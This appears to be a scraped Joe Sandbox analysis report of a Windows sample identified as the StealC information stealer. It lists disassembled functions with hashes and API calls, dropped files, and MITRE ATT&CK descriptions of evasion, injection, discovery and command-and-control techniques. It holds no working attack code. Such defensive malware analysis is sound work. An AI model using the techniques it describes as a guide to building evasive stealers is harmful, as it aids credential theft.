Opcode Fuzzy Hash: 1214f168b6e4d7af61603e865717b0356397f2a796f8462a60e47e72beb01155
Instruction Fuzzy Hash: D4319E71E002689BDB10EFB5CC8CAAEB7B2AF44308F14446BD854AB251DB74DE01DF51

Function 02451677 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02451777: lstrcpy.KERNEL32(00000000), ref: 02451794
Part of subcall function 02451777: lstrcpy.KERNEL32(00000000,?), ref: 024517B6
Part of subcall function 02451777: lstrcpy.KERNEL32(00000000,?), ref: 024517D8
Part of subcall function 02451777: lstrcpy.KERNEL32(00000000,?), ref: 024517FA

lstrcpy.KERNEL32(00000000,?), ref: 0245169E
lstrcpy.KERNEL32(00000000,?), ref: 024516C0
lstrcpy.KERNEL32(00000000,?), ref: 024516E2
lstrcpy.KERNEL32(00000000,?), ref: 02451746

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
Instruction ID: 01e68c51fb6ad92a3a8c14b0c0a75d89782015a3e38dc79971efea6c6cfed346
Opcode Fuzzy Hash: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
Instruction Fuzzy Hash: 6431B874A11B52AFD725DF3AC988957B7E5BF48705704492EA89AC3B10D774F810CF90

Function 02451673 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02451777: lstrcpy.KERNEL32(00000000), ref: 02451794
Part of subcall function 02451777: lstrcpy.KERNEL32(00000000,?), ref: 024517B6
Part of subcall function 02451777: lstrcpy.KERNEL32(00000000,?), ref: 024517D8
Part of subcall function 02451777: lstrcpy.KERNEL32(00000000,?), ref: 024517FA

lstrcpy.KERNEL32(00000000,?), ref: 0245169E
lstrcpy.KERNEL32(00000000,?), ref: 024516C0
lstrcpy.KERNEL32(00000000,?), ref: 024516E2
lstrcpy.KERNEL32(00000000,?), ref: 02451746

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
Instruction ID: 594932c0d814595e53cd55997073022e2043ade684369d329f716c5f55b78f55
Opcode Fuzzy Hash: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
Instruction Fuzzy Hash: 7131B874A11B52AFD725DF3AC984A57B7E5BF48705704492EA89AC3B10D774F810CF90

Function 024717B7 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 024717E8
lstrcpy.KERNEL32(00000000,?), ref: 02471820
lstrcpy.KERNEL32(00000000,?), ref: 02471858
lstrcpy.KERNEL32(00000000,?), ref: 02471890

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
Instruction ID: cedcb2af8ec6b26e7585956fddbc36cacdaef6e7062d136d503a0d94f7847602
Opcode Fuzzy Hash: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
Instruction Fuzzy Hash: 4821D5B4601B029BD735DF7AC998A17B7E6AF44704B144A1EE8AED7B41DB74E400CFA0

Function 00421550 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00421581
lstrcpy.KERNEL32(00000000,?), ref: 004215B9
lstrcpy.KERNEL32(00000000,?), ref: 004215F1
lstrcpy.KERNEL32(00000000,?), ref: 00421629

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
Instruction ID: 80d308abde563585a592328bb7eba962bc113a2ea9b505a2ad5a72594fb3347d
Opcode Fuzzy Hash: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
Instruction Fuzzy Hash: EE211EB4701B029BD724DF3AD958A17B7F5BF54700B444A2EA486D7BA0DB78F840CBA4

Function 0246C39D Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

Part of subcall function 024775A7: lstrlen.KERNEL32(------,02455D82), ref: 024775B2
Part of subcall function 024775A7: lstrcpy.KERNEL32(00000000), ref: 024775D6
Part of subcall function 024775A7: lstrcat.KERNEL32(?,------), ref: 024775E0

Part of subcall function 02477517: lstrcpy.KERNEL32(00000000), ref: 02477545

Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024740AC
Part of subcall function 02474077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024740D6
Part of subcall function 02474077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02451495,?,0000001A), ref: 024740E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5B2
lstrcat.KERNEL32(00000000), ref: 0246C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0246C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246C629

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$SystemTimelstrlen
String ID:
API String ID: 3486790982-0
Opcode ID: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
Instruction ID: 7f75100840e8e96d30fd2ecd8755bade041c6f103a1898eb0597d6ab80009c03
Opcode Fuzzy Hash: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
Instruction Fuzzy Hash: 8421AD70E002699BCB10EFB5CCCCAAEB7B2AF44308F14546BD840AB251DB74D941DF91

Function 02451777 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 02451794
lstrcpy.KERNEL32(00000000,?), ref: 024517B6
lstrcpy.KERNEL32(00000000,?), ref: 024517D8
lstrcpy.KERNEL32(00000000,?), ref: 024517FA

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
Instruction ID: 9baf1a8351ca9180b72749d40b5beb0844107fec68393413a25a842a3d5579c7
Opcode Fuzzy Hash: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
Instruction Fuzzy Hash: A7112474611B126BD7259F3AC858A27B7FAFF44205704452EAC9EC3B41EB74E440CF60

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7gxaFDUSOD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_4CC1.tmp.exe_abfcd7d98352ed9c28e265aaa3746af88ee33f8_44de372d_56aa0865-12d1-434f-954b-74e2efbed7e1\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB4D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB262.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2C1.tmp.xml

C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
7gxaFDUSOD.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0247003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre